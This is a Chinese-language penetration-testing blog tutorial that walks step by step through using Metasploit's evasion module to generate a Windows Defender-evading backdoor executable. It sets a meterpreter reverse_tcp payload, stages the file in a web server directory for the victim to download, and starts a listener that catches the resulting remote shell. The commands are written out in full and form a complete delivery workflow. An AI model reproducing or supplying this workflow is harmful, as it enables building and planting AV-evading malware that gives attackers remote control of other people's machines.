渗透测试-使用metasploit的evasion模块生成后门木马

简介: 渗透测试-使用metasploit的evasion模块生成后门木马

 1.evasion简介

evasion是metasploit自带的模块,使用此模块可以生成反杀毒软件的木马。

2.操作流程

打开kali系统的Metasploit软件。

image.gif编辑

如图,我们可以看到evasion中有7个模块

image.gif编辑 查看模块 search evasionimage.gif编辑

使用模块 use evasion/windows/windows_defender_exeimage.gif编辑

查看需要配置的参数 show options

image.gif编辑

生成软件 set FILENAME 666.exe

image.gif编辑 指定一个payload  set payload windows/meterpreter/reverse_tcp

image.gif编辑

设置监听主机 set LHOST 192.168.0.109

image.gif编辑

run

image.gif编辑

将生成的软件复制到/var/www/html/目录下,便于去下载

cp /root/.msf4/local/666.exe /var/www/html/

image.gif编辑

在MSF上启动handler开始监听后门程序

1.kali启动Metasploit软件

2.使用模块 use exploit/multi/handler,并查看需要配置的参数show options

3.建立payload  set payload windows/meterpreter/reverse_tcp

4.设置监听主机--kali  set LHOSTS 192.168.1.109

5.开启run

win7系统下载生成的666.exe文件

image.gif编辑

运行软件,我们就成功建立会话成功

image.gif编辑


相关文章
|
26天前
|
安全 Linux 网络安全
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(一)
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(一)
53 2
|
26天前
|
Python Windows 网络安全
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(二)
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(二)
46 2
|
19天前
|
安全 Java 数据库
shiro学习一:了解shiro,学习执行shiro的流程。使用springboot的测试模块学习shiro单应用(demo 6个)
这篇文章是关于Apache Shiro权限管理框架的详细学习指南,涵盖了Shiro的基本概念、认证与授权流程,并通过Spring Boot测试模块演示了Shiro在单应用环境下的使用,包括与IniRealm、JdbcRealm的集成以及自定义Realm的实现。
31 3
shiro学习一:了解shiro,学习执行shiro的流程。使用springboot的测试模块学习shiro单应用(demo 6个)
|
18天前
|
计算机视觉
目标检测笔记(二):测试YOLOv5各模块的推理速度
这篇文章是关于如何测试YOLOv5中不同模块(如SPP和SPPF)的推理速度,并通过代码示例展示了如何进行性能分析。
52 3
|
26天前
|
安全 Linux Shell
Kali渗透测试:使用Metasploit对Web应用的攻击
Kali渗透测试:使用Metasploit对Web应用的攻击
75 4
|
13天前
|
测试技术 PHP 开发工具
php性能监测模块XHProf安装与测试
【10月更文挑战第13天】php性能监测模块XHProf安装与测试
15 0
|
26天前
|
安全 网络安全
Kali渗透测试:使用Armitage扫描网络
Kali渗透测试:使用Armitage扫描网络
47 3
|
26天前
|
Java 网络安全 Windows
Kali渗透测试:使用 Armitage生成被控端和主控端
Kali渗透测试:使用 Armitage生成被控端和主控端
47 2
|
1天前
|
编解码 安全 Linux
网络空间安全之一个WH的超前沿全栈技术深入学习之路(10-2):保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali——Liinux-Debian:就怕你学成黑客啦!)作者——LJS
保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali以及常见的报错及对应解决方案、常用Kali功能简便化以及详解如何具体实现
|
26天前
|
存储 安全 小程序
Kali渗透测试:使用Word宏病毒进行渗透攻击
Kali渗透测试:使用Word宏病毒进行渗透攻击
40 1
Kali渗透测试:使用Word宏病毒进行渗透攻击